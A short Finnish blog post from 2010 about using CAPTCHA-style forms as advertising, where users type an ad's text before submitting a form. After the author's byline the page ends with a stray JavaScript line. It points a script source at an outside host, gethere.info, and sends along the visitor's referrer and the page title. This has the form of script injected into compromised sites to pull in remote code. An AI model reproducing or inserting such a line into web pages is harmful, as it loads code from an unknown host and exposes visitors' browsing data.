24.9.2010


Ad Agessa oli äärimmäisen mielenkiintoinen juttu CAPTCHAn käytöstä mainostarkoituksessa. CAPTCHA:lla tarkoitetaan niitä epäselviä kirjaimia, jotka täytyy kirjoittaa, ennen kuin voi lähettää web-lomakkeen. Niitä käytetään varmistamaan, että tiedot on lähettänyt ihminen, ei tietokone.

Joka tapauksessa nyt Yhdysvalloissa on keksitty, että epäselvien kirjainten sijasta käyttäjälle voisi näyttää mainoksen, jonka tekstin käyttäjä joutuu

kirjoittamaan. Idea on kerrassaan loistava: tylsästä pakkotoimenpiteestä tulee mahdollisesti miellyttävämpi pakkotoimenpide ja mainostaja saa varmasti vastinetta rahoilleen, koska käyttäjä ei pääse eteenpäin tutustumatta mainokseen.

Tätä ideaa voisi jalostaa pidemmällekin. Samalla tekniikalla voidaan tehdä ensimmäinen mainosformaatti maailmassa, josta tiedetään absoluuttisen varmasti, että käyttäjä on tutustunut mainoksen. (Vai keksiikö joku jonkun muun formaatin, joka tekee saman?) Nykyiset pakolliset kirjautumiset ja interstitiaalit voisi korvata sivulla, jossa käyttäjä joutuu tutustumaan mainokseen ja vastaamaan siihen liittyvään kysymykseen. Mielelläni näkisin CAPTCHA-interstitiaalit maksullisuuden vaihtoehtona. Maksan mieluummin hetken varauksettomalla huomiolla, en euroilla.

Timo Paloheimo on W.Steinmannin Digital Planner

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ’&default_keyword=’ + encodeURIComponent(document.title) + ”;